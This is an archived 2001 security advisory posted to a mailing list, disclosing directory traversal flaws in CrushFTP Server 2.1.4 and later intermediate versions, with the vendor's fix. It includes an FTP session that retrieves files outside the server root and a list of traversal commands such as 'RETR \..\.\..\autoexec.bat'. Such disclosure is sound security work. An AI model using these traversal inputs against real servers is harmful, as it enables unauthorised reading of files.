OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Thu May 03 2001 - 16:13:40 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in CrushFTP Server

        Overview

    CrushFTP Server 2.1.4 is a java ftp server available from
    http://www.crushftp.com. Multiple vulnerabilities exist which allow
    users to change directories outside of the ftp root and download files.

        Details

    The following is an illustration of the problem. An ftp root of
    "c:\directory\directory" was used.

    >ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220-Welcome to CrushFTP!
    220 CrushFTP Server Ready.
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Username OK. Need password.
    Password:
    230-Welcome!
    230 Password OK. Connected.
    ftp> get ../../autoexec.bat
    200 PORT command successful. 127.0.0.1:1868
    150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
    226-Download File Size:419 bytes 0K/sec.
    226 Transfer complete.
    ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
    ftp> cd ...
    250 "/.../" CWD command successful.
    ftp> get command.com
    200 PORT command successful. 127.0.0.1:1870
    150 Opening ASCII mode data connection for command.com (93890 bytes).
    226-Download File Size:93890 bytes 92K/sec.
    226 Transfer complete.
    ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

    The vendor issued two versions since I made initial contact to address
    additional variations. The following is a list of vulnerabilities which
    affected these intermediate versions (v2.1.5, v2.1.6):

    NLST ..
    NLST ...
    SIZE /../../
    SIZE /.../
    NLST \..\
    NLST /../
    NLST \...\
    RETR \..\.\..\autoexec.bat
    RETR ./\...\autoexec.bat
    RETR .\.\..\..\autoexec.bat

        Solution

    Upgrade to v2.1.7 at:
    http://www.crushftp.com

        Vendor Status

    The program author, Ben Spink, was contacted via <spinkbmac.com> on
    Friday, April 20, 2001. I would like to thank him for taking this
    matter seriously and showing extra effort to resolve these problems.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE
    /eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv
    Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG
    yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI
    0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm
    bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb
    sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH
    wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com